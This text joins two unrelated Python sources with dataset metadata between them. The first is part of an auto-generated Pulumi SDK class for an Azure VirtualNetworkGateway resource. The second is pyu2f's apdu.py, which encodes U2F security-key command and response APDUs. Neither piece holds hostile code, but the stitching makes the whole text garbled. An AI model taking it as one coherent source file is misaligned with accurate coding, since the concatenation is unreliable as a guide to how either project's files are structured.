def vpn_gateway_generation(self, value: Optional[pulumi.Input[Union[str, 'VpnGatewayGeneration']]]):
pulumi.set(self, "vpn_gateway_generation", value)
@property
@pulumi.getter(name="vpnType")
def vpn_type(self) -> Optional[pulumi.Input[Union[str, 'VpnType']]]:
"""
The type of this virtual network gateway.
"""
return pulumi.get(self, "vpn_type")
@vpn_type.setter
def vpn_type(self, value: Optional[pulumi.Input[Union[str, 'VpnType']]]):
pulumi.set(self, "vpn_type", value)
class VirtualNetworkGateway(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
active_active: Optional[pulumi.Input[bool]] = None,
bgp_settings: Optional[pulumi.Input[pulumi.InputType['BgpSettingsArgs']]] = None,
custom_routes: Optional[pulumi.Input[pulumi.InputType['AddressSpaceArgs']]] = None,
enable_bgp: Optional[pulumi.Input[bool]] = None,
enable_dns_forwarding: Optional[pulumi.Input[bool]] = None,
gateway_default_site: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None,
gateway_type: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayType']]] = None,
id: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VirtualNetworkGatewayIPConfigurationArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_guid: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['VirtualNetworkGatewaySkuArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_network_gateway_name: Optional[pulumi.Input[str]] = None,
vpn_client_configuration: Optional[pulumi.Input[pulumi.InputType['VpnClientConfigurationArgs']]] = None,
vpn_gateway_generation: Optional[pulumi.Input[Union[str, 'VpnGatewayGeneration']]] = None,
vpn_type: Optional[pulumi.Input[Union[str, 'VpnType']]] = None,
__props__=None):
"""
A common class for general resource information.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] active_active: ActiveActive flag.
:param pulumi.Input[pulumi.InputType['BgpSettingsArgs']] bgp_settings: Virtual network gateway's BGP speaker settings.
:param pulumi.Input[pulumi.InputType['AddressSpaceArgs']] custom_routes: The reference of the address space resource which represents the custom routes address space specified by the customer for virtual network gateway and VpnClient.
:param pulumi.Input[bool] enable_bgp: Whether BGP is enabled for this virtual network gateway or not.
:param pulumi.Input[bool] enable_dns_forwarding: Whether dns forwarding is enabled or not.
:param pulumi.Input[pulumi.InputType['SubResourceArgs']] gateway_default_site: The reference of the LocalNetworkGateway resource which represents local network site having default routes. Assign Null value in case of removing existing default site setting.
:param pulumi.Input[Union[str, 'VirtualNetworkGatewayType']] gateway_type: The type of this virtual network gateway.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VirtualNetworkGatewayIPConfigurationArgs']]]] ip_configurations: IP configurations for virtual network gateway.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] resource_guid: The resource GUID property of the virtual network gateway resource.
:param pulumi.Input[pulumi.InputType['VirtualNetworkGatewaySkuArgs']] sku: The reference of the VirtualNetworkGatewaySku resource which represents the SKU selected for Virtual network gateway.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[str] virtual_network_gateway_name: The name of the virtual network gateway.
:param pulumi.Input[pulumi.InputType['VpnClientConfigurationArgs']] vpn_client_configuration: The reference of the VpnClientConfiguration resource which represents the P2S VpnClient configurations.
:param pulumi.Input[Union[str, 'VpnGatewayGeneration']] vpn_gateway_generation: The generation for this VirtualNetworkGateway. Must be None if gatewayType is not VPN.
:param pulumi.Input[Union[str, 'VpnType']] vpn_type: The type of this virtual network gateway.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VirtualNetworkGatewayInitArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A common class for general resource information.
:param str resource_name: The name of the resource.
:param VirtualNetworkGatewayInitArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VirtualNetworkGatewayInitArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
active_active: Optional[pulumi.Input[bool]] = None,
bgp_settings: Optional[pulumi.Input[pulumi.InputType['BgpSettingsArgs']]] = None,
custom_routes: Optional[pulumi.Input[pulumi.InputType['AddressSpaceArgs']]] = None,
enable_bgp: Optional[pulumi.Input[bool]] = None,
enable_dns_forwarding: Optional[pulumi.Input[bool]] = None,
gateway_default_site: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None,
gateway_type: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayType']]] = None,
id: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VirtualNetworkGatewayIPConfigurationArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_guid: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['VirtualNetworkGatewaySkuArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_network_gateway_name: Optional[pulumi.Input[str]] = None,
vpn_client_configuration: Optional[pulumi.Input[pulumi.InputType['VpnClientConfigurationArgs']]] = None,
vpn_gateway_generation: Optional[pulumi.Input[Union[str, 'VpnGatewayGeneration']]] = None,
vpn_type: Optional[pulumi.Input[Union[str, 'VpnType']]] = None,
__props__=None):
opts = pulumi.ResourceOptions.merge(_utilities.get_resource_opts_defaults(), opts)
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VirtualNetworkGatewayInitArgs.__new__(VirtualNetworkGatewayInitArgs)
__props__.__dict__["active_active"] = active_active
__props__.__dict__["bgp_settings"] = bgp_settings
__props__.__dict__["custom_routes"] = custom_routes
__props__.__dict__["enable_bgp"] = enable_bgp
__props__.__dict__["enable_dns_forwarding"] = enable_dns_forwarding
__props__.__dict__["gateway_default_site"] = gateway_default_site
__props__.__dict__["gateway_type"] = gateway_type
__props__.__dict__["id"] = id
__props__.__dict__["ip_configurations"] = ip_configurations
__props__.__dict__["location"] = location
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["resource_guid"] = resource_guid
__props__.__dict__["sku"] = sku
__props__.__dict__["tags"] = tags
__props__.__dict__["virtual_network_gateway_name"] = virtual_network_gateway_name
__props__.__dict__["vpn_client_configuration"] = vpn_client_configuration
__props__.__dict__["vpn_gateway_generation"] = vpn_gateway_generation
__props__.__dict__["vpn_type"] = vpn_type
__props__.__dict__["etag"] = None
__props__.__dict__["inbound_dns_forwarding_endpoint"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-native:network:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20150615:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20160330:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20160601:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20160901:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20161201:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20170301:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20170601:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20170801:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20170901:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20171001:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20171101:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20180101:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20180201:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20180401:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20180601:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20180701:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20180801:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20181001:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20181101:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20181201:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20190201:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20190401:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20190601:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20190701:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20190901:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20191101:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20191201:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20200301:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20200401:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20200501:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20200601:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20200701:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20200801:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20201101:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20210201:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20210301:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20210501:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20210801:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20220101:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20220501:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20220701:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20220901:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20221101:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20230201:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20230401:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20230501:VirtualNetworkGateway")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(VirtualNetworkGateway, __self__).__init__(
'azure-native:network/v20190801:VirtualNetworkGateway',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'VirtualNetworkGateway':
"""
Get an existing VirtualNetworkGateway resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = VirtualNetworkGatewayInitArgs.__new__(VirtualNetworkGatewayInitArgs)
__props__.__dict__["active_active"] = None
__props__.__dict__["bgp_settings"] = None
__props__.__dict__["custom_routes"] = None
__props__.__dict__["enable_bgp"] = None
__props__.__dict__["enable_dns_forwarding"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["gateway_default_site"] = None
__props__.__dict__["gateway_type"] = None
__props__.__dict__["inbound_dns_forwarding_endpoint"] = None
__props__.__dict__["ip_configurations"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["resource_guid"] = None
__props__.__dict__["sku"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
__props__.__dict__["vpn_client_configuration"] = None
__props__.__dict__["vpn_gateway_generation"] = None
__props__.__dict__["vpn_type"] = None
return VirtualNetworkGateway(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="activeActive")
def active_active(self) -> pulumi.Output[Optional[bool]]:
"""
ActiveActive flag.
"""
return pulumi.get(self, "active_active")
@property
@pulumi.getter(name="bgpSettings")
def bgp_settings(self) -> pulumi.Output[Optional['outputs.BgpSettingsResponse']]:
"""
Virtual network gateway's BGP speaker settings.
"""
return pulumi.get(self, "bgp_settings")
@property
@pulumi.getter(name="customRoutes")
def custom_routes(self) -> pulumi.Output[Optional['outputs.AddressSpaceResponse']]:
"""
The reference of the address space resource which represents the custom routes address space specified by the customer for virtual network gateway and VpnClient.
"""
return pulumi.get(self, "custom_routes")
@property
@pulumi.getter(name="enableBgp")
def enable_bgp(self) -> pulumi.Output[Optional[bool]]:
"""
Whether BGP is enabled for this virtual network gateway or not.
"""
return pulumi.get(self, "enable_bgp")
@property
@pulumi.getter(name="enableDnsForwarding")
def enable_dns_forwarding(self) -> pulumi.Output[Optional[bool]]:
"""
Whether dns forwarding is enabled or not.
"""
return pulumi.get(self, "enable_dns_forwarding")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[Optional[str]]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter(name="gatewayDefaultSite")
def gateway_default_site(self) -> pulumi.Output[Optional['outputs.SubResourceResponse']]:
"""
The reference of the LocalNetworkGateway resource which represents local network site having default routes. Assign Null value in case of removing existing default site setting.
"""
return pulumi.get(self, "gateway_default_site")
@property
@pulumi.getter(name="gatewayType")
def gateway_type(self) -> pulumi.Output[Optional[str]]:
"""
The type of this virtual network gateway.
"""
return pulumi.get(self, "gateway_type")
@property
@pulumi.getter(name="inboundDnsForwardingEndpoint")
def inbound_dns_forwarding_endpoint(self) -> pulumi.Output[str]:
"""
The IP address allocated by the gateway to which dns requests can be sent.
"""
return pulumi.get(self, "inbound_dns_forwarding_endpoint")
@property
@pulumi.getter(name="ipConfigurations")
def ip_configurations(self) -> pulumi.Output[Optional[Sequence['outputs.VirtualNetworkGatewayIPConfigurationResponse']]]:
"""
IP configurations for virtual network gateway.
"""
return pulumi.get(self, "ip_configurations")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the virtual network gateway resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> pulumi.Output[Optional[str]]:
"""
The resource GUID property of the virtual network gateway resource.
"""
return pulumi.get(self, "resource_guid")
@property
@pulumi.getter
def sku(self) -> pulumi.Output[Optional['outputs.VirtualNetworkGatewaySkuResponse']]:
"""
The reference of the VirtualNetworkGatewaySku resource which represents the SKU selected for Virtual network gateway.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="vpnClientConfiguration")
def vpn_client_configuration(self) -> pulumi.Output[Optional['outputs.VpnClientConfigurationResponse']]:
"""
The reference of the VpnClientConfiguration resource which represents the P2S VpnClient configurations.
"""
return pulumi.get(self, "vpn_client_configuration")
@property
@pulumi.getter(name="vpnGatewayGeneration")
def vpn_gateway_generation(self) -> pulumi.Output[Optional[str]]:
"""
The generation for this VirtualNetworkGateway. Must be None if gatewayType is not VPN.
"""
return pulumi.get(self, "vpn_gateway_generation")
@property
@pulumi.getter(name="vpnType")
def vpn_type(self) -> pulumi.Output[Optional[str]]:
"""
The type of this virtual network gateway.
"""
return pulumi.get(self, "vpn_type")
|
462e385d29a67e98f716cf20fb122c3c7189f7e8
|
3a6a211ea0d32405497fbd6486c490bb147e25f9
|
/third_party/gsutil/third_party/pyu2f/pyu2f/apdu.py
|
fee2abdb160f367fb66dfe8aefe06688015d5155
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
catapult-project/catapult
|
e2cbdd5eb89f3b1492fc8752494e62ea1df4bae0
|
53102de187a48ac2cfc241fef54dcbc29c453a8e
|
refs/heads/main
| 2021-05-25T07:37:22.832505
| 2021-05-24T08:01:49
| 2021-05-25T06:07:38
| 33,947,548
| 2,032
| 742
|
BSD-3-Clause
| 2022-08-26T16:01:18
| 2015-04-14T17:49:05
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,878
|
py
|
apdu.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implement the U2F variant of ISO 7816 extended APDU.
This module implements a subset ISO 7816 APDU encoding. In particular,
it only supports extended length encoding, it only supports commands
that expect a reply, and it does not support explicitly specifying
the length of the expected reply.
It also implements the U2F variant of ISO 7816 where the Lc field
is always specified, even if there is no data.
"""
import struct
from pyu2f import errors
CMD_REGISTER = 0x01
CMD_AUTH = 0x02
CMD_VERSION = 0x03
class CommandApdu(object):
"""Represents a Command APDU.
Represents a Command APDU sent to the security key. Encoding
is specified in FIDO U2F standards.
"""
cla = None
ins = None
p1 = None
p2 = None
data = None
def __init__(self, cla, ins, p1, p2, data=None):
self.cla = cla
self.ins = ins
self.p1 = p1
self.p2 = p2
if data and len(data) > 65535:
raise errors.InvalidCommandError()
if data:
self.data = data
def ToByteArray(self):
"""Serialize the command.
Encodes the command as per the U2F specs, using the standard
ISO 7816-4 extended encoding. All Commands expect data, so
Le is always present.
Returns:
Python bytearray of the encoded command.
"""
lc = self.InternalEncodeLc()
out = bytearray(4) # will extend
out[0] = self.cla
out[1] = self.ins
out[2] = self.p1
out[3] = self.p2
if self.data:
out.extend(lc)
out.extend(self.data)
out.extend([0x00, 0x00]) # Le
else:
out.extend([0x00, 0x00, 0x00]) # Le
return out
def ToLegacyU2FByteArray(self):
"""Serialize the command in the legacy format.
Encodes the command as per the U2F specs, using the legacy
encoding in which LC is always present.
Returns:
Python bytearray of the encoded command.
"""
lc = self.InternalEncodeLc()
out = bytearray(4) # will extend
out[0] = self.cla
out[1] = self.ins
out[2] = self.p1
out[3] = self.p2
out.extend(lc)
if self.data:
out.extend(self.data)
out.extend([0x00, 0x00]) # Le
return out
def InternalEncodeLc(self):
dl = 0
if self.data:
dl = len(self.data)
# The top two bytes are guaranteed to be 0 by the assertion
# in the constructor.
fourbyte = struct.pack('>I', dl)
return bytearray(fourbyte[1:])
class ResponseApdu(object):
"""Represents a Response APDU.
Represents a Response APU sent by the security key. Encoding
is specified in FIDO U2F standards.
"""
body = None
sw1 = None
sw2 = None
def __init__(self, data):
self.dbg_full_packet = data
if not data or len(data) < 2:
raise errors.InvalidResponseError()
if len(data) > 2:
self.body = data[:-2]
self.sw1 = data[-2]
self.sw2 = data[-1]
def IsSuccess(self):
return self.sw1 == 0x90 and self.sw2 == 0x00
def CheckSuccessOrRaise(self):
if self.sw1 == 0x69 and self.sw2 == 0x85:
raise errors.TUPRequiredError()
elif self.sw1 == 0x6a and self.sw2 == 0x80:
raise errors.InvalidKeyHandleError()
elif self.sw1 == 0x69 and self.sw2 == 0x84:
raise errors.InvalidKeyHandleError()
elif not self.IsSuccess():
raise errors.ApduError(self.sw1, self.sw2)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.